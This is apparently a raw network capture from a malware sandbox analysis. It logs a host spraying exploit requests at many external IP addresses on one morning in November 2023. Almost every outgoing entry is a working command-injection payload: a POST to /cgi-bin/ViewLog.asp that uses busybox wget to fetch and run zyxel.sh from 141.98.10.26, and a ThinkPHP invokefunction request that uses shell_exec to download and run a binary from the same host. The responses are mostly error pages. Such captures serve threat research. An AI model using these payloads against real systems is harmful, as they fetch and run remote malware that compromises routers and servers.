Nov 22, 2023 08:40:19.710889101 CET	18118	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:31.741234064 CET	19601	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:56.058046103 CET	19775	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
838	192.168.2.23	56220	62.29.84.241	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.431807995 CET	17086	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
839	192.168.2.23	52710	94.122.70.205	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.439101934 CET	17088	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
840	192.168.2.23	55318	95.101.225.37	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.663033009 CET	17095	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.841145039 CET	17100	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:10 GMT Date: Wed, 22 Nov 2023 07:40:10 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 37 63 38 36 34 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 38 31 30 26 23 34 36 3b 31 65 37 34 38 39 61 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.77c8645f.1700638810.1e7489ad</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
841	192.168.2.23	37360	95.217.58.34	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.679991961 CET	17096	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.874977112 CET	17102	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:10 GMT Server: Apache/2.4.29 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 311 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 61 30 31 3a 34 66 39 3a 34 61 3a 31 32 32 34 3a 3a 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at 2a01:4f9:4a:1224::2 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
842	192.168.2.23	44676	95.65.80.241	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.705723047 CET	17097	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.929303885 CET	17107	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
843	192.168.2.23	52692	94.111.5.163	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.768471956 CET	17098	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
844	192.168.2.23	33694	94.246.56.126	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.772764921 CET	17099	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
845	192.168.2.23	33536	62.29.54.43	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.877897978 CET	17103	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
846	192.168.2.23	56528	62.29.76.208	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.881535053 CET	17104	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
847	192.168.2.23	48332	31.45.210.249	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.881673098 CET	17105	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:11.112343073 CET	17116	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:10 GMT Server: X-Frame-Options: SAMEORIGIN Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob: Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
848	192.168.2.23	38828	94.122.197.152	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.889518023 CET	17105	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
849	192.168.2.23	56324	31.0.243.41	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.915380001 CET	17106	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
850	192.168.2.23	40200	95.163.97.122	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:11.064618111 CET	17109	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:11.280086040 CET	17132	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 22 Nov 2023 07:40:11 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
851	192.168.2.23	50934	94.121.75.175	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.464281082 CET	17328	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
852	192.168.2.23	53814	88.12.59.124	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.481780052 CET	17329	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:12.679709911 CET	17335	IN	HTTP/1.1 401 Unauthorized Date: Wed, 22 Nov 2023 03:32:22 GMT Server: Apache/2.4.10 (Raspbian) WWW-Authenticate: Basic realm="Only Authorized users" Content-Length: 458 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p><hr><address>Apache/2.4.10 (Raspbian) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
853	192.168.2.23	48312	85.198.8.3	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.484549046 CET	17329	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
854	192.168.2.23	44496	95.86.82.8	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.701508999 CET	17337	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
855	192.168.2.23	47296	31.136.221.157	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.876032114 CET	17340	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.439889908 CET	17446	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:14.559638023 CET	17523	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:16.895282984 CET	17826	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
